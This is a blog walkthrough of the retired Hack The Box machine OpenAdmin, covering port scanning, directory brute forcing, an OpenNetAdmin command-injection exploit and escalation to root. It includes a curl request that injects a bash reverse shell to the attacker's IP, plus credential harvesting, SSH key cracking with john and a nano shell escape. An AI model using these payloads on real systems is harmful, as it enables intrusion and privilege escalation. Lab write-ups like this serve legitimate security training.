OpenAdmin(Linux-based) Machine Walkthrough HTB
Hello Awesome Hackers, nice to meet you all this blog will focus on a retired box on HackTheBox.
Machine - IP: 10.10.10.171
NSE: Loaded 125 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 21:31 Completed NSE at 21:31, 0.00s elapsed Initiating NSE at 21:31 Completed NSE at 21:31, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 21:31 Completed Parallel DNS resolution of 1 host. at 21:31, 0.00s elapsed Initiating Connect Scan at 21:31 Scanning 10.10.10.171 [1000 ports] Discovered open port 22/tcp on 10.10.10.171 Discovered open port 80/tcp on 10.10.10.171 Increasing send delay for 10.10.10.171 from 0 to 5 due to max_successful_tryno increase to 4 Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 69.70% done; ETC: 21:32 (0:00:15 remaining) Completed Connect Scan at 21:32, 52.39s elapsed (1000 total ports) NSE: Script scanning 10.10.10.171. Initiating NSE at 21:32 Completed NSE at 21:32, 15.85s elapsed Initiating NSE at 21:32 Completed NSE at 21:32, 0.00s elapsed Nmap scan report for 10.10.10.171 Host is up (0.63s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-title: Apache2 Ubuntu Default Page: It works NSE: Script Post-scanning. Initiating NSE at 21:32 Completed NSE at 21:32, 0.00s elapsed Initiating NSE at 21:32 Completed NSE at 21:32, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 68.46 seconds```
—> port 22 - ssh
—> Port 80 - HTTP
Now I open this IP address on the browser, it is showing Apache2 default page.
Directory Brute Force
gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php,txt,html -o gobuster-root-php_txt_html
/music (Status: 301) /artwork (Status: 301) /sierra (Status: 301)```
Coming to the login page, we got the “open net admin” version let’s recon about the “ona".
Now I see that Version v18.1.1 which it is warning is not the latest.
Now, I trying to find the exploit by using searchsploit
Run the netcat command
nc -nvlp 443
Now I trying to get the shell by using this Curl command
curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs=tooltips&xajaxargs=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.7/443 0>%261'&xajaxargs=ping" http://10.10.10.171/ona/
I get the shell
Now my task is to go from www-data to jimmy. Now I started the Enumeration and check everything like config files, PHP files, etc. I get some juicy data.
So here we got some credentials for the database.
Now let’s check how many users are present in the home directory of this machine. Here we got there are two users present in the machine and that is "Jimmy" and "Joanna"
Let’s try to connect through the ssh port for the user jimmy with the above password which we found in the database_settings.inc.php file. I successfully logged in.
Now I found the interesting directory inside the /var/www/ is /internal
The PHP must be hosted using a web server and a particular port MUST be used.
Now I copied the private key back to my box. I used ssh2john converts the key into a format that john the ripper can understand and crack the passphrase.
sh2john.py id_rsa > hash
john –wordlist=/usr/share/wordlists/rockyou.txt hash
Once the password is cracked. here is the password
now I was given permission to id_rsa
chmod 600 id_rsa
now I trying to log in using ssh port
ssh -i id_rsa email@example.com
and enter the passphrase and hit enter. We are successfully logged in. Now we using this command
When inside nano press Ctrl+r followed by Ctl+x. Nano will prompt you which command you want to execute. The command essentially opens a shell on the box as a root.
we get the shell. here are the flags
user.txt 32charactershashedflag root.txt 32charactershashedflag
Thank you for Reading